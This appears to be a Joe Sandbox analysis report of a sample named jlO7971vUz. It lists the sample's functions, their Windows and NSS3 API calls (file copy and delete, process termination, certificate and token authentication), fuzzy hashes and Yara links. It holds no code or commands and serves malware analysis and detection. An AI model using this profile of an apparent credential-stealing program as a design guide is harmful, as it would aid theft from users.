Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
String ID: %_^l
API String ID: 2877228265-2977215540
Opcode ID: 60d004f39c11431551f6c5faa8857ba71d1c9373744463d23b543aee59867f05
Instruction ID: 3d057275f0e62153505659b1b21608df5174d85dd5e4d4f8a0d4404292c9a96f
Opcode Fuzzy Hash: 60d004f39c11431551f6c5faa8857ba71d1c9373744463d23b543aee59867f05
Instruction Fuzzy Hash: FBF0E5B2E0171897EB109A56EC00B9773EC9B0065DF048074DC2A97B01E372FC068BE2

Function 017F6C60 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,017F742E,00000000), ref: 017F6C6B
HeapAlloc.KERNEL32(00000000,?,?,017F742E,00000000), ref: 017F6C72
wsprintfW.USER32 ref: 017F6C88

Strings

%hs, xrefs: 017F6C7F

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 12afe3489a78d9e306a307c393a0e8781610cb1095b70e59f9695bc795757da2
Instruction ID: 29edfd4e6302e0daa41b19a2887db70965b2242d784eaab2b9dcdb5d54c5d9e2
Opcode Fuzzy Hash: 12afe3489a78d9e306a307c393a0e8781610cb1095b70e59f9695bc795757da2
Instruction Fuzzy Hash: CDE0ECB9A84208BFDB20DFD4D80AE6D7BBCFB08715F004158FA0ED7244DA719E119B96

Function 017ECB80 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F6A70: GetSystemTime.KERNEL32(?,013B5F88,017FE129,?,?,?,?,?,?,?,?,?,017E4643,?,00000014), ref: 017F6A96

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 017ECC01
lstrlen.KERNEL32(00000000), ref: 017ECE18
lstrlen.KERNEL32(00000000), ref: 017ECE2C
DeleteFileA.KERNEL32(00000000), ref: 017ECEA5

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 1fc12339cb912d214e8640ebdb7c17729997f121271c55b2f952edade097d51c
Instruction ID: 9b5ad977a7e5b933fe99ac611b67c7f4b4659dd3f3b1ce5d383b3df6c378437b
Opcode Fuzzy Hash: 1fc12339cb912d214e8640ebdb7c17729997f121271c55b2f952edade097d51c
Instruction Fuzzy Hash: B491ED72C1010A9ACF15FBA4DC98EEFF378AF24300F50416DE21666259EF746A49CB67

Function 6C614FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C4F85D2,00000000,?,?), ref: 6C614FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C61500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6150C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6150D6

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 49379e9912f76326f4a689aab464c135ca29d84bd6a67ec41c49705ad9f78345
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 66418EB2A002118FCB18CF59DCD179AB7E1BF4531971D466DD84ACBB02E379E891CB85

Function 6C66A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C66A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C66A662), ref: 6C66A69E
Part of subcall function 6C66A690: PR_NewCondVar.NSS3(?), ref: 6C66A6B4

PR_IntervalNow.NSS3 ref: 6C66A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C66A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C66A944
PR_SetPollableEvent.NSS3(?), ref: 6C66A94F

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: c1da668d280a2411e7bfcef28f20b43b3a2d50fa737523f003361e3c45fefb65
Instruction ID: 47edc7f8175260106c2eeff3c4c366dc1fad9ad785f41bbd6de73ee563773585
Opcode Fuzzy Hash: c1da668d280a2411e7bfcef28f20b43b3a2d50fa737523f003361e3c45fefb65
Instruction Fuzzy Hash: 0E4159B4A01A129FC704CF2AC580956FBF1FF49318724866AD54ACBF12E731E850CB95

Function 6C556C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C556C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C556CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C556CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C678FE0), ref: 6C556CFE

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: a29911f8a066db8851d12ba5e091574f7c2c8e84ea3b477a2e48b02bc0e5881e
Instruction ID: 1436fb66018cf604491a79a54a76af3696c136eca48f4eefc04b3c50087ffe57
Opcode Fuzzy Hash: a29911f8a066db8851d12ba5e091574f7c2c8e84ea3b477a2e48b02bc0e5881e
Instruction Fuzzy Hash: CC3181B1A002169FDB04CF65CC91ABFBBF5EF85248B50483ED905E7710EB319915CBA0

Function 6C664F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C664F5D
free.MOZGLUE(?), ref: 6C664F74
free.MOZGLUE(?), ref: 6C664F82
GetLastError.KERNEL32 ref: 6C664F90

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 3104332c7fb6d6393840ac67f71b9bbbc747046a2fbc7f34e344f0a58902a5c9
Instruction ID: e6982468961eedbbb17cb044563d88d28e70244f48b6ce6e5d56773e49c00ebc
Opcode Fuzzy Hash: 3104332c7fb6d6393840ac67f71b9bbbc747046a2fbc7f34e344f0a58902a5c9
Instruction Fuzzy Hash: D2314D75A002095BDB01DFABDC91BEFB3B8EF85358F040125EC15A7B40DB75A914869A

Function 017F2330 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 017F2358

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

strtok_s.MSVCRT ref: 017F244F

Part of subcall function 017F8640: lstrlen.KERNEL32(00000000,?,?,017F3D93,017FE4BB,017FE4BA,?,?,017F4A46,00000000,?,013B09B8,?,017FE988,?,00000000), ref: 017F864B
Part of subcall function 017F8640: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F86A5

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 70f3c2b68d604ab9719f7118cb0d5129e4ab5425fcedde452ba6c1810be3a9d5
Instruction ID: 189894fef0ad149554616cc9e3e7862f0cc2fb1787522070dcb9c88dd9e9d044
Opcode Fuzzy Hash: 70f3c2b68d604ab9719f7118cb0d5129e4ab5425fcedde452ba6c1810be3a9d5
Instruction Fuzzy Hash: C241F875D10109DBCF08EFA4D858AEFF774AF54304F04801DE61166255EB709A09CBA6

Function 017F73E0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 017F73FB

Part of subcall function 017F6C60: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,017F742E,00000000), ref: 017F6C6B
Part of subcall function 017F6C60: HeapAlloc.KERNEL32(00000000,?,?,017F742E,00000000), ref: 017F6C72
Part of subcall function 017F6C60: wsprintfW.USER32 ref: 017F6C88

OpenProcess.KERNEL32(00001001,00000000,?), ref: 017F74BB
TerminateProcess.KERNEL32(00000000,00000000), ref: 017F74D9
CloseHandle.KERNEL32(00000000), ref: 017F74E6

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 7f51e748d9ee26c1b14f3c0dd40e3e7adec220d22fea6d77f348716a97a2cd5f
Instruction ID: 88ad7be6347125615bd25a7484e9cde32bcc8ba6cea26d75c2abcfd9eef7c792
Opcode Fuzzy Hash: 7f51e748d9ee26c1b14f3c0dd40e3e7adec220d22fea6d77f348716a97a2cd5f
Instruction Fuzzy Hash: 13311BB5E00208DBEB24DFE0CD48BEEB778BB44300F10845DE606AA288DB746A45CF52

Function 6C5C2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6C5C2896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6C5C2932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5C294C
free.MOZGLUE(?), ref: 6C5C2955

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 32cd10d94eccc7563fc25aba349a12b5687f5153367c8bd1f3496efdc8fca368
Instruction ID: 5a371b42a3388f853bb2f522abf421c57ab289427e3d08877caf924009e442bf
Opcode Fuzzy Hash: 32cd10d94eccc7563fc25aba349a12b5687f5153367c8bd1f3496efdc8fca368
Instruction Fuzzy Hash: 1B21B2B67006009BE7109BA6EC49F5777E5EFC4358F04093CE44AC7A61FB72E8598752

Function 6C5C2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5C2E08

Part of subcall function 6C5B14C0: TlsGetValue.KERNEL32 ref: 6C5B14E0
Part of subcall function 6C5B14C0: EnterCriticalSection.KERNEL32 ref: 6C5B14F5
Part of subcall function 6C5B14C0: PR_Unlock.NSS3 ref: 6C5B150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C5C2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C5C2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5C2E95

Part of subcall function 6C5B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5588A4,00000000,00000000), ref: 6C5B1228
Part of subcall function 6C5B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C5B1238
Part of subcall function 6C5B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5588A4,00000000,00000000), ref: 6C5B124B
Part of subcall function 6C5B1200: PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0,00000000,00000000,00000000,?,6C5588A4,00000000,00000000), ref: 6C5B125D
Part of subcall function 6C5B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C5B126F
Part of subcall function 6C5B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C5B1280
Part of subcall function 6C5B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C5B128E
Part of subcall function 6C5B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C5B129A
Part of subcall function 6C5B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C5B12A1

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 037ae489c58d9585b5de4904566647d13bd19664e31483836fcfb525c3a86577
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 9021C2B1E007458BEB00CF959D44BBB3A64ABD134CF111269DD087B642F7B1EA9882A2

Function 6C57ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C57ACC2

Part of subcall function 6C552F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C552F0A
Part of subcall function 6C552F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C552F1D

Part of subcall function 6C552AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C550A1B,00000000), ref: 6C552AF0
Part of subcall function 6C552AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C552B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C57AD5E

Part of subcall function 6C5957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C55B41E,00000000,00000000,?,00000000,?,6C55B41E,00000000,00000000,00000001,?), ref: 6C5957E0
Part of subcall function 6C5957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C595843

CERT_DestroyCertList.NSS3(?), ref: 6C57AD36

Part of subcall function 6C552F50: CERT_DestroyCertificate.NSS3(?), ref: 6C552F65
Part of subcall function 6C552F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C552F83

free.MOZGLUE(?), ref: 6C57AD4F

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: cf050d23900490a5e17d578a8a57597c5c1fea233a793cff28e8580c804df7d3
Instruction ID: fa766c255ffbbe324d2f37a6d6dba28dcb83b9b89400c9bf7e30382ecc6ad61a
Opcode Fuzzy Hash: cf050d23900490a5e17d578a8a57597c5c1fea233a793cff28e8580c804df7d3
Instruction Fuzzy Hash: 6421D1B1D002048BEB20DFA5DD455EEB7B4AF45248F455069D8097B600FB32EEA9CBB6

Function 6C57C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C57C890

Part of subcall function 6C578F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C578FAF
Part of subcall function 6C578F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C578FD1
Part of subcall function 6C578F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C578FFA
Part of subcall function 6C578F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C579013
Part of subcall function 6C578F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C579042
Part of subcall function 6C578F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C57905A
Part of subcall function 6C578F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C579073
Part of subcall function 6C578F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C56DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C579111

PR_GetCurrentThread.NSS3 ref: 6C57C8B2

Part of subcall function 6C619BF0: TlsGetValue.KERNEL32(?,?,?,6C660A75), ref: 6C619C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C57C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C57C8EB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: f81bf02989d74826a13950610f91b9a31efe30c4ea1c59b298534aed15909e97
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 0701DF76E01111BBD72027B99C80BFF35699F8615CF040135FD04A6B01F7519D9893F2

Function 6C5AECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C5AF0AD,6C5AF150,?,6C5AF150,?,?,?), ref: 6C5AECBA

Part of subcall function 6C5B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5587ED,00000800,6C54EF74,00000000), ref: 6C5B1000
Part of subcall function 6C5B0FF0: PR_NewLock.NSS3(?,00000800,6C54EF74,00000000), ref: 6C5B1016
Part of subcall function 6C5B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5587ED,00000008,?,00000800,6C54EF74,00000000), ref: 6C5B102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C5AECD1

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C5AED02

Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C5AED5A

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
